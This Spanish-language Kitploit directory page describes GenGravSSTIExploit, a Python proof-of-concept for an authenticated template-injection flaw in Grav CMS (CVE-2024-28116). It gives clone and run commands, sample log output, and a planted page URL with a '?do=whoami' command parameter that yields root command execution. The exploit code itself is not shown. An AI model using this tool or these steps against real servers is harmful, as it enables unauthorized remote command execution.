Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GenGravSSTIExploit — es un script Python PoC que explota una vulnerabilidad de inyección de plantillas en el lado del servidor (SSTI) autenticada en Grav CMS versiones <= 1.7.44 (CVE-2024-28116) | Kitploit
Herramientas/GitHubGitHub/geniuszly/gengravsstiexploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

es un script Python PoC que explota una vulnerabilidad de inyección de plantillas en el lado del servidor (SSTI) autenticada en Grav CMS versiones <= 1.7.44 (CVE-2024-28116)

Ver Repositorio
72hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ES

GenGravSSTIExploit es un script PoC en Python que explota una vulnerabilidad autenticada de inyección de plantillas del lado del servidor (SSTI) en Grav CMS versiones <= 1.7.44 (CVE-2024-28116). Esta vulnerabilidad permite a un usuario con permisos de editor ejecutar comandos del SO en un servidor remoto.

Nota: Este script requiere credenciales válidas para autenticarse en la consola de Grav CMS.

Características

  • Se autentica en el panel de administración de Grav CMS usando credenciales de editor.
  • Crea una nueva página en el CMS para inyectar un payload.
  • Ejecuta comandos del SO de forma remota aprovechando la vulnerabilidad SSTI.

Requisitos

  • Python 3.x
  • Librería requests (instalar con pip install requests)

Uso

  1. Clonar el repositorio

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. Configurar credenciales

    Edita el script para proporcionar tus credenciales de editor de Grav CMS:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. Ejecutar el script

    Usa el siguiente comando para ejecutar el script:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: URL objetivo en el formato http[s]://hostname.
    • <PORT>: Número de puerto (por defecto 80).

    Ejemplo:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. Interactuar con el exploit

    Si el exploit tiene éxito, recibirás una URL donde podrás ejecutar comandos del SO:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

Salida de ejemplo

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

El script realizará cada paso, proporcionándote actualizaciones a través del terminal. Esto es lo que podrías ver:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

Después de que el script termine, verás un mensaje con el enlace a la página inyectada. Puedes visitar este enlace para ejecutar comandos del SO

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

Visitar la URL con el comando especificado mostrará la salida directamente en la página:

root@kitploit:~
Cmd-Output:
root

Aviso legal

Esta herramienta está destinada únicamente para fines educativos. Úsala de manera responsable y solo en sistemas donde tengas permiso explícito. El autor no se hace responsable de ningún uso indebido o daño causado por este script.

Descargar herramienta